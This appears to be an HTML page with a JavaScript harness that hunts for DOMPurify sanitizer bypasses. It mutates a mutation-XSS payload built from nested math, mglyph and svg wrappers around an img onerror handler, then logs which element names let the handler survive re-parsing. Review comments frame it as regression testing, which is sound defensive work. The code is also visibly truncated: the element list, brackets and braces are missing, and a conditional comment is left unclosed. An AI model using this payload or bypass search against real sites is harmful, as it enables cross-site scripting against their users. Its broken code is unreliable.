<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]> <html class="no-js"> <!--<![endif]-->
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="">
<!-- NOTE(review): the stylesheet href above and the script src below are empty in this listing.
     The test script calls DOMPurify.sanitize, so the sanitizer library has to be loaded before it runs.
     Load a pinned release, and add integrity and crossorigin attributes if it comes from a third-party origin,
     so that a result can be tied to one exact sanitizer version. -->
<!-- NOTE(review): the conditional comment opened on the next line has no visible endif line in this listing;
     it looks like part of the page template was lost. -->
<!--[if lt IE 7]>
<p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="#">upgrade your browser</a> to improve your experience.</p>
<script src=""></script>
// Regression harness: checks whether a string returned by DOMPurify.sanitize stays harmless
// when it is parsed as HTML a second time. The check runs once the page has loaded.
window.onload = () => {
// NOTE(review): this listing is truncated. The entries and closing bracket of the element
// list are missing, and so are the closing braces of the blocks below; restore them from the
// original before running.
const allElements = [
// Test markup: nested math / mtext / option / mglyph / svg wrappers around a <style> element.
// The <img onerror> marker is written inside a title attribute value, where it is inert for
// as long as it remains attribute text.
const payload = `<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><a title="</style><img src='#' onerror='alert(1)'>">`;
const domParser = new DOMParser();
allElements.forEach(element => {
// Swap the <style> wrapper for the candidate element name. String.replace with a string
// pattern changes only the first match; each of the two tags occurs once in payload.
let newPayload = payload.replace("<style>", `<${element}>`).replace("</style>", `</${element}>`);
// Configuration under test: "target" is additionally allowed as an attribute and "style" is
// forbidden as a tag. The result is used as a string (no DOM return option is set here).
const sanitized = DOMPurify.sanitize(newPayload, {
ADD_ATTR: ["target"],
FORBID_TAGS: ["style"]
// Second parse of the sanitized string, presumably modelling a consumer that inserts the
// string into a page. A DOMParser document is inert, so the handler is inspected, not run.
const parsedDOM = domParser.parseFromString(sanitized, 'text/html');
// An <img> that still carries onerror after the second parse means the sanitized string was
// not stable under re-parsing for this element name.
// NOTE(review): only img/onerror is looked for, so a clean run covers this one marker and is
// not evidence that the configuration is safe in general.
parsedDOM.querySelectorAll(`img`).forEach(img => {
if(img.attributes["onerror"]) {
// A hit is a finding against the sanitizer version and options in use. The usual remedies
// are upgrading DOMPurify and consuming a DOM result (RETURN_DOM or RETURN_DOM_FRAGMENT)
// instead of re-parsing a string.
console.log(`Found bypass: ${element}`);